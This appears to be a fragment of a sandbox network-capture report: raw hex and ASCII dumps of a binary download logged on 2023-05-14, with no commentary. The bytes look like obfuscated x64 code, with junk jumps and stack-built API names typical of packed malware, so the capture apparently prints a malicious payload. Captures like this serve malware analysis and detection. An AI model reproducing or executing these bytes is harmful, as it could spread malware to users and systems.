                            2023-05-14 02:51:07 UTC1806INData Raw: 00 00 ae 1c 48 8b 4c 24 70 ff 54 24 28 b8 01 00 00 00 e9 05 00 00 00 e9 00 00 00 00 48 83 c4 60 5f c3 89 54 24 10 48 89 4c 24 08 57 48 83 ec 60 e9 00 00 00 00 48 8d 44 24 20 48 8d 64 24 f8 eb 04 80 3d 1e b8 48 89 04 24 e9 07 00 00 00 b2 b4 c9 99 26 11 1c 9f eb 02 7d 7f f9 e9 03 00 00 00 bc 16 11 72 03 b6 e5 90 e8 06 00 00 00 1f 97 e9 94 eb f3 48 83 04 24 13 eb 02 27 b1 c3 7c 6d c2 e9 06 00 00 00 3c af a0 fe df 57 9e 48 8b 04 24 e9 06 00 00 00 d8 42 a0 a8 90 a7 48 8d 64 24 08 eb 05 b0 ea 55 d1 cf eb 02 84 61 48 8b f8 33 c0 eb 02 9c 29 48 8d 64 24 f8 e9 07 00 00 00 6a 24 cb b5 d5 14 73 48 89 04 24 eb 03 20 3b 31 9f f8 73 04 dc 8b 11 e4 e8 07 00 00 00 79 ed cc a1 a4 74 86 48 83 c4 08 e9 04 00 00 00 eb f7 a1 25 eb 06 e2 89 60 2a c2 4e 9e 48 8b 04 24 48 8d 64
                            Data Ascii: HL$pT$(H`_T$HL$WH`HD$ Hd$=H$&}rH$'|m<WH$BHd$UaH3)Hd$j$sH$ ;1sytH%`*NH$Hd
                            2023-05-14 02:51:07 UTC1822INData Raw: b9 01 00 00 00 f3 aa 48 8d 54 24 46 48 8d 4c 24 20 e8 8a 59 fd ff 48 8b c8 e8 b5 14 01 00 48 8b c8 e8 c6 45 fe ff 48 89 44 24 28 48 8d 44 24 21 48 8b f8 33 c0 b9 01 00 00 00 f3 aa 48 8d 54 24 38 48 8d 4c 24 21 e8 80 38 fd ff 48 8b c8 e8 32 58 00 00 48 8b d0 48 8b 4c 24 28 e8 68 40 fe ff 48 89 44 24 30 48 8b 4c 24 70 ff 54 24 30 48 83 c4 60 5f c3 40 57 48 83 ec 60 e9 5c 00 00 00 eb 05 42 a2 2d f7 f1 48 8d 64 24 f8 48 89 04 24 eb 02 fa ee 9f e9 07 00 00 00 42 fa 6d af 54 7d 2e e9 04 00 00 00 d4 38 eb d1 e8 02 00 00 00 86 f2 48 83 04 24 16 38 ff 74 04 ce 1e 6c 1e c3 b5 60 5e 13 88 85 eb 05 d4 aa a6 aa 8d 9e 58 e9 02 00 00 00 d2 ce e9 02 00 00 00 1c f9 48 8d 44 24 20 48 8b f8 33 c0 48 8d 64 24 f8 eb 07 e0 25 de 76 73 8c 46 48 89 04 24 9f eb 03 fe 4d 52 e8 05
                            Data Ascii: HT$FHL$ YHHEHD$(HD$!H3HT$8HL$!8H2XHHL$(h@HD$0HL$pT$0H`_@WH`\B-Hd$H$BmT}.8H$8tl`^XHD$ H3Hd$%vsFH$MR
                            2023-05-14 02:51:07 UTC1838INData Raw: 89 04 24 e9 03 00 00 00 b5 e7 48 9f e9 06 00 00 00 21 60 41 8e 32 19 f9 72 07 5f e3 86 cf 77 6a 36 e8 05 00 00 00 3d ef 61 89 8c 48 ff c4 38 c9 e9 02 00 00 00 b7 c5 74 07 56 a9 f4 30 25 35 f2 48 ff c4 f9 72 06 bb 46 22 29 5d 91 48 ff c4 e9 05 00 00 00 b5 ab 77 c2 8c 48 ff c4 f9 eb 04 4c e6 fc f7 72 04 e7 4d e4 a8 48 ff c4 f8 e9 07 00 00 00 d5 8c fc 7c ed 8f 78 73 04 86 2e 4c 62 48 ff c4 eb 02 56 de 48 ff c4 f8 e9 04 00 00 00 50 b0 9d b1 73 03 28 bd d4 48 ff c4 38 ed e9 02 00 00 00 71 cb 74 03 84 42 a0 e9 02 00 00 00 2e 68 eb 05 dd 8b 29 9c 78 9e 58 0f 83 77 02 00 00 eb 07 45 d6 da 18 4e 1a 12 48 8d 64 24 f8 e9 06 00 00 00 23 ad 4e 39 6a 70 48 89 04 24 e9 07 00 00 00 5a 4a 13 51 33 65 45 9f eb 05 9e 64 dd 14 97 38 f6 eb 06 cf 47 15 48 31 dd 74 03 d8 37 3f
                            Data Ascii: $H!`A2r_wj6=aH8tV0%5HrF")]HwHLrMH|xs.LbHVHPs(H8qtB.h)xXwENHd$#N9jpH$ZJQ3eEd8GH1t7?
                            2023-05-14 02:51:07 UTC1854INData Raw: 44 24 12 6c eb 02 14 45 48 8d 64 24 f8 eb 04 d1 dd a0 50 48 89 04 24 eb 03 cc b4 c9 9f e8 06 00 00 00 17 8d 40 eb f8 65 48 8d 64 24 08 e9 03 00 00 00 92 47 c8 9e 58 e9 07 00 00 00 f2 1f cb 1f b1 47 1c eb 07 c6 5a f6 cc 55 68 75 c6 44 24 13 65 c6 44 24 14 61 c6 44 24 15 6e e9 02 00 00 00 80 c4 9c e9 06 00 00 00 f2 57 30 f1 b1 44 e9 02 00 00 00 75 7c e8 05 00 00 00 f1 66 66 90 67 48 8d 64 24 08 9d eb 07 45 cb 6b be c0 5f f8 c6 44 24 16 75 50 e9 06 00 00 00 40 14 96 53 36 65 9f f9 eb 07 de e0 e3 d8 54 dd a8 72 07 c5 40 6d de 54 1f 14 e8 05 00 00 00 6f 20 e2 6b 7e 48 8d 64 24 08 e9 07 00 00 00 db 45 e7 d3 c1 40 46 9e 58 eb 03 2a d2 89 c6 44 24 17 70 c6 44 24 18 47 c6 44 24 19 72 e9 04 00 00 00 20 fd ec 11 50 e9 07 00 00 00 6c 92 bf 53 51 dd 5e 9f e9 05 00 00
                            Data Ascii: D$lEHd$PH$@eHd$GXGZUhuD$eD$aD$nW0Du|ffgHd$Ek_D$uP@S6eTr@mTo k~Hd$E@FX*D$pD$GD$r PlSQ^
                            2023-05-14 02:51:07 UTC1870INData Raw: 02 d7 69 73 03 a4 8e 3e 48 ff c4 eb 02 ff e2 48 ff c4 f8 eb 04 84 c5 41 1e 73 03 45 d2 7c e9 03 00 00 00 3b bb 3c 9d eb 02 bf 9b e9 06 00 00 00 59 95 6b fc 41 91 e9 00 00 00 00 48 83 c4 28 c3 48 89 4c 24 08 48 83 ec 18 e9 9d 00 00 00 e9 04 00 00 00 14 69 12 a7 9c e9 04 00 00 00 49 39 6b ea e9 07 00 00 00 f3 e9 7c 23 d1 d9 ef e8 04 00 00 00 fb 5f 6b d4 48 ff c4 38 e4 e9 04 00 00 00 e5 fc 16 db 74 05 e9 fd ab b8 39 48 ff c4 38 d2 74 04 28 86 d8 69 48 ff c4 eb 06 6c bf c1 6b fb d8 48 ff c4 f9 e9 03 00 00 00 7c 3b 33 72 03 f0 ef 5a 48 ff c4 f8 eb 03 db 2a 11 73 05 b7 3f a1 9b b8 48 ff c4 48 ff c4 48 ff c4 f9 eb 02 db 63 72 07 3f 66 f7 51 15 d1 4b 9d eb 06 79 64 21 66 99 78 e9 04 00 00 00 57 d7 92 5b 48 c7 04 24 00 00 00 00 e9 fe 00 00 00 eb 04 e0 ee 25 4a 50
                            Data Ascii: is>HHAsE|;<YkAH(HL$HiI9k|#_kH8t9H8t(iHlkH|;3rZH*s?HHHcr?fQKyd!fxW[H$%JP
                            2023-05-14 02:51:07 UTC1886INData Raw: 18 49 d3 a0 48 ff c4 f9 e9 07 00 00 00 73 15 4d 24 b4 dd 57 72 07 53 75 cf 12 79 b5 29 48 ff c4 38 ed 74 06 62 45 f5 9d 11 88 eb 05 82 20 b8 e0 c1 eb 05 37 88 71 c3 83 9e 58 eb 04 92 1e e9 f6 c6 44 24 09 65 c6 44 24 0a 74 c6 44 24 0b 46 c6 44 24 0c 69 48 8d 64 24 f8 48 89 04 24 e9 05 00 00 00 78 7e 45 cc 8e 9f e9 06 00 00 00 f6 cb 51 3a d7 23 eb 02 b2 e6 e8 04 00 00 00 9c 4b bc 15 48 83 04 24 25 38 f6 e9 06 00 00 00 7a 8e c1 97 2a 27 74 06 64 80 54 22 25 4b c3 49 ee 95 bb b5 94 e9 04 00 00 00 58 f7 a1 b2 9e 48 8b 04 24 eb 03 d6 5a 35 48 8d 64 24 08 eb 04 93 c4 e4 fa eb 05 53 69 e0 76 c3 c6 44 24 0d 6c eb 04 e5 8b d9 f9 9c e9 03 00 00 00 4e ea 52 eb 02 66 5c e8 06 00 00 00 ce 65 11 9a 9c b5 48 83 04 24 17 e9 03 00 00 00 b8 7d 7b c3 5c 97 14 eb 05 a8 e9 61
                            Data Ascii: IHsM$WrSuy)H8tbE 7qXD$eD$tD$FD$iHd$H$x~EQ:#KH$%8z*'tdT"%KIXH$Z5Hd$SivD$lNRf\eH$}{\a
                            2023-05-14 02:51:07 UTC1902INData Raw: 48 ff c4 f9 eb 02 24 93 72 07 43 ac 32 68 b0 b7 5d 48 ff c4 e9 04 00 00 00 25 72 7c 56 48 ff c4 f8 73 07 c2 be f2 20 22 af 87 48 ff c4 38 d2 eb 07 6e 86 6a 46 36 90 41 74 02 b7 82 48 ff c4 f8 73 03 92 58 d8 48 ff c4 f9 e9 06 00 00 00 62 d5 c7 2a 4d fc 72 06 29 ec ef 48 6c 7e 48 ff c4 f8 eb 06 b8 1a 6f e3 dc be 73 02 65 4c eb 02 8a 78 9e 58 eb 02 bb cd c6 44 24 0d 61 9c eb 03 60 17 90 f8 e9 06 00 00 00 82 fb b5 7b 41 f1 73 03 88 f4 33 e8 02 00 00 00 1c 53 48 8d 64 24 08 9d c6 44 24 0e 74 eb 04 49 f4 52 e4 50 eb 07 de c6 73 cc a3 86 bf 9f e9 02 00 00 00 69 e6 38 ed eb 06 48 48 b9 27 95 21 74 02 48 74 e8 02 00 00 00 e2 b3 48 8d 64 24 08 eb 04 5b df 6d 1f 9e 58 e9 04 00 00 00 88 4b 2f d8 eb 04 31 74 9d ac c6 44 24 0f 65 e9 05 00 00 00 28 84 28 f2 17 50 e9 02
                            Data Ascii: H$rC2h]H%r|VHs "H8njF6AtHsXHb*Mr)Hl~HoseLxXD$a`{As3SHd$D$tIRPsi8HH'!tHtHd$[mXK/1tD$e((P
                            2023-05-14 02:51:07 UTC1918INData Raw: ff c4 eb 05 6e a9 9c 71 85 eb 07 45 7e b9 da 62 6a ae 9e 48 8b 04 24 e9 03 00 00 00 c3 53 fa 48 8d 64 24 08 eb 05 f3 b4 81 9f e5 eb 06 4f 38 20 ec 16 7b 48 ff c0 48 89 04 24 48 83 3c 24 0d eb 07 c3 60 a6 b1 65 49 80 48 8d 64 24 f8 eb 05 55 76 90 75 1a 48 89 04 24 eb 04 eb cd 6a b0 9f e9 05 00 00 00 9b 8f 69 7f 44 eb 05 ee 9d 5b 1a ac e8 06 00 00 00 c4 37 1e cb 83 57 48 ff c4 eb 04 bf 7c f8 3a 48 ff c4 f9 e9 04 00 00 00 2e 5e 30 da 72 05 95 74 ed 97 fe 48 ff c4 e9 03 00 00 00 f9 e0 ee 48 ff c4 38 ff eb 07 9b 9f 7b 8c aa ef f0 74 04 7d 78 11 ae 48 ff c4 38 db eb 04 21 f5 20 ad 74 02 9f 40 48 ff c4 38 ed e9 04 00 00 00 a0 21 e6 4a 74 06 fe 11 78 78 3a 64 48 ff c4 f9 72 05 ea bc cf ff 4e 48 ff c4 eb 04 53 5a 90 91 e9 02 00 00 00 e5 4d eb 05 4b ed 74 e8 f7 9e
                            Data Ascii: nqE~bjH$SHd$O8 {HH$H<$`eIHd$UvuH$jiD[7WH|:H.^0rtHH8{t}xH8! t@H8!Jtxx:dHrNHSZMKt
                            2023-05-14 02:51:07 UTC1934INData Raw: 38 d2 74 04 7b bc c4 1c 48 ff c4 38 ed 74 07 41 67 58 b4 93 c2 61 48 ff c4 f9 eb 04 48 e2 6b 41 72 07 98 4c 2f 3f 8e f3 87 48 ff c4 f8 73 05 6c 3d c4 f0 37 e9 02 00 00 00 f9 32 9e 48 8b 04 24 e9 04 00 00 00 c3 d3 f8 6e 48 8d 64 24 08 eb 02 4b 78 e9 03 00 00 00 6d 5c 26 0f 83 cf 01 00 00 48 8b 04 24 50 e9 07 00 00 00 19 ce 49 3f 5b d6 e0 9f e9 05 00 00 00 18 52 dc 33 3e f9 e9 07 00 00 00 d5 27 e3 95 65 e7 1e 72 07 9f 9e c5 e0 a9 48 49 e8 05 00 00 00 46 55 7a 51 51 48 ff c4 38 ff e9 03 00 00 00 ad d5 bd 74 06 b1 ec dd a3 55 83 48 ff c4 f8 73 02 42 40 48 ff c4 48 ff c4 38 db eb 02 58 48 74 02 6a e2 48 ff c4 f9 eb 05 3f c1 a0 69 62 72 06 65 59 6e 9c dd 9c 48 ff c4 38 c0 eb 07 b7 cd 94 98 26 b5 7e 74 07 83 fe 35 58 45 9f 99 48 ff c4 38 db e9 07 00 00 00 c0 4b
                            Data Ascii: 8t{H8tAgXaHHkArL/?Hsl=72H$nHd$Kxm\&H$PI?[R3>'erHIFUzQQH8tUHsB@HH8XHtjH?ibreYnH8&~t5XEH8K
                            2023-05-14 02:51:07 UTC1950INData Raw: 07 00 00 00 e6 e4 91 67 e6 19 cc eb 07 4a 59 89 ab b6 78 2a e9 05 00 00 00 e9 00 00 00 00 48 83 c4 28 c3 48 89 4c 24 08 48 83 ec 28 e9 4f 00 00 00 eb 07 9a ec 8e 55 e3 6c b4 9c f9 eb 07 22 3c fe 4c ac aa 31 72 03 29 8f 1d e8 07 00 00 00 4e d1 4c 64 60 b9 40 48 83 04 24 21 f8 eb 05 e9 a8 c2 8c f6 73 07 18 ac c2 7a 9d 6d e7 c3 11 58 dc eb 03 c3 63 33 9d e9 05 00 00 00 1e fc f0 dc cc c6 44 24 08 4e c6 44 24 09 74 e9 04 00 00 00 6d de c3 4d 48 8d 64 24 f8 48 89 04 24 e9 07 00 00 00 de bb f4 f4 45 39 6f 9f eb 06 74 70 13 1b 6d ed f8 73 02 84 4d e8 06 00 00 00 72 17 66 1e 3d ee 48 8d 64 24 08 e9 04 00 00 00 80 ef 9c c0 9e 58 c6 44 24 0a 53 c6 44 24 0b 65 c6 44 24 0c 74 c6 44 24 0d 49 c6 44 24 0e 6e eb 03 dd 32 4d 48 8d 64 24 f8 eb 07 bb 7e 11 ad b2 92 f5 48 89
                            Data Ascii: gJYx*H(HL$H(OUl"<L1r)NLd`@H$!szmXc3D$ND$tmMHd$H$E9otpmsMrf=Hd$XD$SD$eD$tD$ID$n2MHd$~H
                            2023-05-14 02:51:07 UTC1966INData Raw: e4 e9 03 00 00 00 76 3e a4 74 02 75 66 e8 06 00 00 00 16 f0 8a 7b d7 6d 48 83 c4 08 9d eb 02 14 fe eb 06 ab 2e eb fa e4 ed c6 44 24 17 4f c6 44 24 18 62 c6 44 24 19 6a c6 44 24 1a 65 eb 06 ec 17 86 27 27 31 50 e9 04 00 00 00 43 81 87 f8 9f e9 05 00 00 00 2c de 44 da d1 f9 eb 04 f6 ee 6d f5 72 06 49 d0 26 b6 87 ee e8 05 00 00 00 92 96 49 14 a0 48 83 c4 08 eb 07 53 2c 5b c9 6a cd 69 e9 05 00 00 00 5e 66 3d 1e 70 9e 48 8b 04 24 e9 07 00 00 00 73 3f 2c 81 98 fe 66 48 8d 64 24 08 c6 44 24 1b 63 50 9f e9 05 00 00 00 dc fe e6 8a 38 f8 73 03 17 34 66 e8 07 00 00 00 ae 58 4e 61 8c fc 28 48 83 04 24 10 c3 c5 33 71 e9 03 00 00 00 1e 9c 37 e9 07 00 00 00 75 1d 40 9e 19 d5 71 9e 48 8b 04 24 48 8d 64 24 08 e9 07 00 00 00 ef 38 c5 a3 4a b0 5b c6 44 24 1c 74 eb 05 11 30
                            Data Ascii: v>tuf{mH.D$OD$bD$jD$e''1PC,DmrI&IHS,[ji^f=pH$s?,fHd$D$cP8s4fXNa(H$3q7u@qH$Hd$8J[D$t0
                            2023-05-14 02:51:07 UTC1982INData Raw: 1d f9 e9 02 00 00 00 c8 51 72 07 8d b1 aa 1a c0 d6 92 c3 47 71 6f e9 04 00 00 00 77 92 a9 37 9e 58 eb 07 78 df 3d 71 a9 e2 f2 48 8b 44 24 30 e9 c1 00 00 00 e9 02 00 00 00 f9 1f 9c 38 d2 e9 05 00 00 00 a2 87 b0 9f 9a 74 03 42 7a fd e8 07 00 00 00 e1 de 61 a8 7a c2 27 48 ff c4 38 f6 e9 05 00 00 00 f0 3b fb 2f 4d 74 02 af f4 48 ff c4 e9 07 00 00 00 7b 6c 4a fb a1 44 98 48 ff c4 eb 03 e5 16 63 48 ff c4 f9 72 07 d3 51 d3 cc ed 1b a2 48 ff c4 38 db e9 02 00 00 00 e2 a5 74 06 34 e3 5a 7a a9 2e 48 ff c4 f9 eb 07 da 93 1c 55 a4 3d 6a 72 06 cc 48 de 64 cb 55 48 ff c4 38 c0 e9 05 00 00 00 a0 a0 f9 92 5d 74 03 93 6b 5c 48 ff c4 38 e4 e9 03 00 00 00 31 41 17 74 02 bc ae e9 04 00 00 00 7e 9f 35 43 9d e9 03 00 00 00 4c df bb e9 00 00 00 00 48 83 c4 28 c3 48 89 4c 24 08
                            Data Ascii: QrGqow7Xx=qHD$08tBzaz'H8;/MtH{lJDHcHrQH8t4Zz.HU=jrHdUH8]tk\H81At~5CLH(HL$
                            2023-05-14 02:51:07 UTC1998INData Raw: 46 ba 6a 5c ff f9 eb 07 61 b7 58 18 bb 60 73 72 04 4e b5 38 39 e8 05 00 00 00 a3 bd a5 d6 ad 48 ff c4 f9 72 04 4a 2e c3 70 48 ff c4 38 d2 74 07 fa fc d8 68 75 1f 55 48 ff c4 38 f6 74 03 eb 2c 79 48 ff c4 f9 72 04 df 54 2d 68 48 ff c4 f9 e9 06 00 00 00 8e 91 3a 7b c0 d1 72 03 99 ce 48 48 ff c4 48 ff c4 38 db e9 02 00 00 00 f3 51 74 07 8d af fa 77 3c 35 f0 48 ff c4 e9 03 00 00 00 bf d3 e7 e9 03 00 00 00 fc 3e 63 e9 06 00 00 00 7c 98 67 86 d0 11 9e 48 8b 04 24 e9 04 00 00 00 82 16 20 1c 48 8d 64 24 08 e9 06 00 00 00 64 8b dd a4 cd 11 85 c0 48 8d 64 24 f8 e9 06 00 00 00 be b9 e7 f4 a0 b0 48 89 04 24 e9 05 00 00 00 13 78 76 d2 9b 9f e9 07 00 00 00 79 5d d2 2e ab 62 f7 f8 73 07 84 d1 69 50 38 31 a1 e8 04 00 00 00 bb d9 f7 ac 48 ff c4 f8 73 04 16 a3 de c8 48 ff
                            Data Ascii: Fj\aX`srN89HrJ.pH8thuUH8t,yHrT-hH:{rHHH8Qtw<5H>c|gH$ Hd$dHd$H$xvy].bsiP81HsH
                            2023-05-14 02:51:07 UTC2014INData Raw: 24 f8 eb 02 2d 39 48 89 04 24 9f e9 06 00 00 00 65 94 eb b1 4b b2 f8 73 02 40 33 e8 02 00 00 00 36 d6 48 83 04 24 1e f9 e9 07 00 00 00 62 3f 64 3a a4 4f 1c 72 04 11 f4 71 53 c3 96 e0 d2 eb 06 e3 95 33 dd eb b5 9e 58 eb 06 8a 23 fe 77 96 ac e9 03 00 00 00 6d e9 ba 48 8b 84 c1 1a 01 00 00 48 89 44 24 30 48 83 7c 24 30 00 48 8d 64 24 f8 eb 03 dc 7c 53 48 89 04 24 9f eb 05 9f 36 b4 b1 53 f9 eb 05 36 40 2c 82 84 72 04 8c a0 ab 19 e8 05 00 00 00 90 e9 3f ae cd 48 8d 64 24 08 e9 04 00 00 00 9a 7c 41 96 9e 48 8b 04 24 eb 05 54 ed 63 df 9a 48 8d 64 24 08 eb 05 1e 6a a1 54 17 e9 07 00 00 00 af e4 98 db 30 6d 32 0f 84 6b 03 00 00 eb 04 d1 35 c4 b0 50 eb 07 be 6b b5 79 42 63 89 9f e9 02 00 00 00 d2 b0 eb 07 85 79 7e 3a 18 b2 75 e8 06 00 00 00 1e c8 1b bc 6d 7e 48 83
                            Data Ascii: $-9H$eKs@36H$b?d:OrqS3X#wmHHD$0H|$0Hd$|SH$6S6@,r?Hd$|AH$TcHd$jT0m2k5PkyBcy~:um~H
                            2023-05-14 02:51:07 UTC2030INData Raw: 87 59 48 ff c4 38 f6 eb 04 d9 22 f9 d1 74 03 11 3f d3 48 ff c4 f9 72 04 4e e3 1a a6 48 ff c4 48 ff c4 f8 73 02 bd ba 48 ff c4 f8 73 06 62 aa 4a 50 d0 f0 eb 06 a5 f8 d7 6b f6 6d 9e 48 8b 04 24 eb 04 95 59 e3 c3 48 8d 64 24 08 eb 04 dc 94 6a fa 48 8b 4c 24 70 8b 4c 01 08 e8 0d f4 fa ff 48 89 84 24 98 00 00 00 4c 8d 8c 24 98 00 00 00 4c 8d 84 24 a8 00 00 00 ba 40 04 00 00 48 8d 4c 24 78 e8 5b eb fb ff 89 44 24 48 83 7c 24 48 00 0f 8c b5 00 00 00 e9 04 00 00 00 8e 13 6a 58 9c e9 04 00 00 00 b0 e4 c0 58 e8 02 00 00 00 22 80 48 83 04 24 12 f8 73 02 e5 e6 c3 5c 91 74 42 37 e9 03 00 00 00 1d 8c d1 9d eb 07 7c 14 31 82 3b 69 95 c7 44 24 64 01 00 00 00 e9 a5 00 00 00 50 eb 05 f4 98 d2 2e 42 9f eb 07 90 6d f7 9c 90 7b 6e f8 73 05 6d 41 72 6c 26 e8 03 00 00 00 8d a5
                            Data Ascii: YH8"t?HrNHHsHsbJPkmH$YHd$jHL$pLH$L$L$@HL$x[D$H|$HjXX"H$s\tB7|1;iD$dP.Bm{nsmArl&
                            2023-05-14 02:51:07 UTC2046INData Raw: e9 b5 0f b7 44 24 20 48 8d 64 24 f8 e9 05 00 00 00 72 ca a1 a1 fc 48 89 04 24 e9 04 00 00 00 d2 1f c1 e2 9f e9 06 00 00 00 17 c9 4d 80 47 ec 38 c0 e9 03 00 00 00 1e 5e 7b 74 04 5d 66 53 32 e8 06 00 00 00 4b 92 1f 27 d3 ae 48 83 04 24 18 38 c0 74 03 60 a8 1c c3 2c f7 9b 43 4a 9e 58 e9 07 00 00 00 14 b8 1f 34 9d f4 d5 eb 05 cc be 35 e0 94 48 6b c0 0c 9c eb 04 f2 25 64 ac eb 05 cb 4a e6 ab 6e e8 05 00 00 00 f0 87 51 55 fb 48 83 04 24 1c 38 ff eb 04 cd 29 97 a4 74 03 4e f2 62 c3 b2 bd 2d d8 e9 03 00 00 00 29 9b 9a 9d e9 07 00 00 00 83 9c 73 36 73 c4 f4 e9 03 00 00 00 43 a3 75 48 8b 4c 24 30 50 eb 02 e6 1e 9f eb 06 b7 7e f9 a7 18 a9 38 db e9 03 00 00 00 9d bb 85 74 07 e7 7a bc 94 f4 f0 f4 e8 05 00 00 00 eb f9 46 4a 4c 48 83 c4 08 eb 02 51 e0 eb 06 e1 86 b6 af
                            Data Ascii: D$ Hd$rH$MG8^{t]fS2K'H$8t`,CJX45Hk%dJnQUH$8)tNb-)s6sCuHL$0P~8tzFJLHQ
                            2023-05-14 02:51:07 UTC2062INData Raw: 05 6f cc ed 30 ea 9c e9 02 00 00 00 9a 92 eb 06 38 2d 78 74 c6 fa e8 05 00 00 00 60 97 a3 eb 42 48 ff c4 38 c9 e9 06 00 00 00 9d 89 c1 47 89 e2 74 04 b2 60 78 55 48 ff c4 f9 e9 03 00 00 00 a6 5f bb 72 04 89 1b 8c 8e 48 ff c4 48 ff c4 48 ff c4 48 ff c4 38 ed 74 06 f7 db 56 31 41 73 48 ff c4 eb 07 d7 75 60 2a f3 fc 83 48 ff c4 f9 eb 02 36 cb 72 02 ae 2b 9d e9 04 00 00 00 e1 de 18 42 c6 44 24 08 4c 9c e9 03 00 00 00 34 c5 b1 f9 72 02 26 4d e8 03 00 00 00 a7 db 2b 48 83 c4 08 9d c6 44 24 09 64 c6 44 24 0a 72 c6 44 24 0b 52 c6 44 24 0c 65 48 8d 64 24 f8 48 89 04 24 9f eb 04 8a cb d7 62 f8 eb 02 c7 62 73 07 7a ea f1 60 9c 45 ee e8 05 00 00 00 2c 2b 88 b2 99 48 ff c4 eb 02 9d 2e 48 ff c4 38 ff eb 07 81 af 9e ec f8 f1 3f 74 04 62 fb 94 8b 48 ff c4 f9 e9 05 00 00
                            Data Ascii: o08-xt`BH8Gt`xUH_rHHHH8tV1AsHu`*H6r+BD$L4r&M+HD$dD$rD$RD$eHd$H$bbsz`E,+H.H8?tbH
                            2023-05-14 02:51:07 UTC2078INData Raw: 71 c7 48 95 6e dd 6b 81 30 7a b1 8e 78 2b 99 d0 ad 62 d2 80 d2 fd 5f 79 54 6f da e7 5d 72 7a 42 e0 49 92 e6 7b 84 5a 30 3d e9 40 ac ff 94 db 76 77 df 72 1c f0 da f7 49 82 db 46 4c ba 37 57 a0 84 3f b8 9c d0 ca 9c d1 54 2e 5c 31 96 8b e5 2f 46 ec f4 e4 6e 5b 33 b6 4e b2 d7 d8 30 73 c9 1e 1b c5 4f 1d e0 35 f9 1d d1 22 de f2 b1 56 40 ac dc 25 65 63 27 d4 7a 4e d7 d0 90 90 90 90 48 83 c4 48 c3 44 88 4c 24 20 44 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 56 57 48 83 ec 78 e9 3b 00 00 00 50 9f e9 06 00 00 00 58 1e 4f 5e 31 57 f9 eb 02 91 48 72 07 7e cb a5 61 be 42 75 e8 04 00 00 00 96 97 fc 54 48 8d 64 24 08 e9 04 00 00 00 cb ad f5 71 9e 58 eb 05 d6 c7 ab ae ba 8b 8c 24 a0 00 00 00 e9 04 00 00 00 f2 2b 74 6f 9c eb 02 7f da 38 ed e9 05 00 00 00 aa d1 56 c8 5f 74
                            Data Ascii: qHnk0zx+b_yTo]rzBI{Z0=@vwrIFL7W?T.\1/Fn[3N0sO5"V@%ec'zNHHDL$ DD$HT$HL$VWHx;PXO^1WHr~aBuTHd$qX$+to8V_t
                            2023-05-14 02:51:07 UTC2094INData Raw: 55 19 a5 39 eb 05 ff 32 2b 67 5e e9 02 00 00 00 19 4a 9e 48 8b 04 24 e9 04 00 00 00 97 84 f2 5b 48 8d 64 24 08 e9 06 00 00 00 97 66 80 32 e2 c9 48 89 44 24 40 eb 03 3b c4 ab 50 eb 03 81 3b 7f 9f eb 06 51 ef ff 6a c0 b5 eb 04 85 6b 45 12 e8 04 00 00 00 14 25 e5 61 48 83 04 24 0e c3 68 2f 41 fa eb 02 d2 e0 9e 48 8b 04 24 e9 04 00 00 00 ee db 6f e4 48 8d 64 24 08 eb 03 6a e9 33 e9 04 00 00 00 da 5f 50 b7 b8 08 00 00 00 48 6b c0 09 48 8b 4c 24 68 48 8d 64 24 f8 e9 04 00 00 00 92 9f 69 5c 48 89 04 24 e9 04 00 00 00 db cf 42 79 9f e9 05 00 00 00 4a 83 d2 4e 23 f9 e9 07 00 00 00 85 61 eb 66 1c de 57 72 03 94 e5 7d e8 02 00 00 00 8f f8 48 ff c4 38 ff 74 04 6f d3 c1 1f 48 ff c4 f9 eb 02 7c 36 72 06 9e 2d e7 ce 11 7b 48 ff c4 eb 02 cc c5 48 ff c4 f9 eb 06 63 74 a2
                            Data Ascii: U92+g^JH$[Hd$f2HD$@;P;QjkE%aH$h/AH$oHd$j3_PHkHL$hHd$i\H$ByJN#afWr}H8toH|6r-{HHct
                            2023-05-14 02:51:07 UTC2110INData Raw: 58 eb 04 e0 68 ac e5 e9 04 00 00 00 3b 56 e7 66 c6 44 24 0e 46 eb 05 cd 2b 81 1e 19 9c e9 06 00 00 00 e1 f3 aa c4 c3 5c e8 04 00 00 00 1a 16 20 be 48 ff c4 f9 eb 05 f9 51 c1 f9 7e 72 04 48 88 a2 2d 48 ff c4 e9 04 00 00 00 f4 71 50 af 48 ff c4 f9 72 05 3c fb db 72 ed 48 ff c4 f9 72 07 92 e4 66 81 d1 4d 8d 48 ff c4 48 ff c4 eb 03 fe 2d e2 48 ff c4 f8 e9 04 00 00 00 f4 f3 6b bc 73 05 1e 72 83 67 bd 48 ff c4 f8 eb 02 6e b8 73 02 72 1c e9 02 00 00 00 ea 30 9d eb 07 a8 e3 aa 9d 3a 4d 97 eb 05 84 13 ec c5 1b c6 44 24 0f 75 eb 02 bf 47 9c eb 04 9a 83 55 4c 38 ed 74 05 7d b4 fd 52 2a e8 02 00 00 00 5b 1f 48 83 04 24 19 f9 e9 02 00 00 00 f5 60 72 02 90 c6 c3 1a e7 41 65 9b eb 03 ce 4a b3 9d e9 04 00 00 00 c6 82 2a b0 c6 44 24 10 6e c6 44 24 11 63 c6 44 24 12 74 c6
                            Data Ascii: Xh;VfD$F+\ HQ~rH-HqPHr<rHrfMHH-HksrgHnsr0:MD$uGUL8t}R*[H$`rAeJ*D$nD$cD$t
                            2023-05-14 02:51:07 UTC2126INData Raw: 30 77 3b e7 52 9f 04 51 f2 13 3f d6 50 b4 2d bb 6e bc 87 e6 6b 62 73 c0 62 9c d7 e8 da e6 48 d0 9c 5e 9f 3a f5 59 cc ab 39 e8 85 31 ea c3 94 02 bb da 7b 79 11 bd 1d 02 54 40 ba 06 5c c9 90 ed 22 e1 a0 20 3c 8e d2 dc 53 c3 2a ed 48 27 1b 0b 63 6d 0f 25 62 77 b7 66 89 65 8b 50 c1 c4 71 ad 9c 6a 2d 15 46 69 46 6a 10 69 2c 16 42 6e 23 5b 4c 41 2a 8f 7f ec 5d 7d 3f 5c d0 42 b4 66 76 7d 02 b1 49 4c dc 58 59 32 f7 19 e9 41 61 d1 5f bb f0 e5 e7 1d 82 05 65 31 1e c3 52 95 1b 74 a6 54 62 5f 6a ef ab 30 d6 17 62 61 e6 3d 5a 7c a3 02 47 fa 2c d8 49 aa 93 8d 21 82 6c f7 d7 c1 e1 03 08 ae 8b 57 ec d2 d8 99 4f 55 6d 0d 4d bc f1 23 ea a8 1b f0 66 75 f6 c5 d2 0c 87 d0 5c 27 75 f2 49 ba 00 19 c9 db 09 7c 95 cf 8c 83 3a 6c bb af b4 ae c6 5f da 34 7c 01 4a 55 ba 40 b5 5c 29
